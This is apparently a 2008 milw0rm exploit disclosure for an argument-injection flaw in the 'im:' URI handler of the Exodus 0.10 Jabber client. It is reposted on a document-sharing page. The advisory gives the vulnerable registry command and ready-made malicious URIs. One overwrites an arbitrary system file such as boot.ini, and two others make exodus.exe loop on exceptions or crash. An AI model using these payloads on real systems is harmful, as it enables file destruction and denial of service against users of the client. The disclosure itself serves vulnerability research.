Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability.pdf

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

Exodus handler arbitrary parameter uri handler arbitrary

1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 Exodus v0.10 uri handler arbitrary parameter injection
3 by Nine:Situations:Group::strawdog
4 tested against IE8b/xpsp3
5 may not work against non−English systems because of an installation bug
6 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
7 software site: http://code.google.com/p/exodus/
8 description:
9 Exodus is a free software instant messaging client developed by Peter
10 Millard and written in Borland Delphi that can connect to Jabber servers
11 and exchange messages with other Jabber users. Currently, binaries are
12 only available for Microsoft Windows. Exodus was designed as the official
13 successor of the Winjab client, as Winjab was a personal project that
14 was becoming too difficult to maintain[..]
15 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
16
17 reg key:
18 HKEY_CLASSES_ROOT\im\shell\Open\command
19 C:\Program Files\Exodus\Exodus.exe −u ’%1’
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 it’s possible to inject arbitrary command line parameters, ex. this shows
22 the argument list:
23 im:///’%20−?
24
25 this overwrites an arbitrary file:
26 im:///’%20−l%20c:\boot.ini%20−v
27
28 now boot.ini looks like this:
29 [2008−11−17 13.50.41.437]  Trying to setup the Auto Away timer.
30 [2008−11−17 13.50.41.453]  Using Win32 API for Autoaway checks!!
31 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
32 todo:
33 investigate this even:
34 im:///’%20−c%20[A*300]
35
36 this will cause an infinite loop trough multiple unhandled exceptions
37 and this:
38 im:///’%20−c%20file:///aaaa%20
39 crash exodus.exe
40 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
41 our site −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−> http://retrogod.altervista.org
42
43 # milw0rm.com [2008−11−17]
Page 1/1
Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability
Nine:Situations:Group
11/17/2008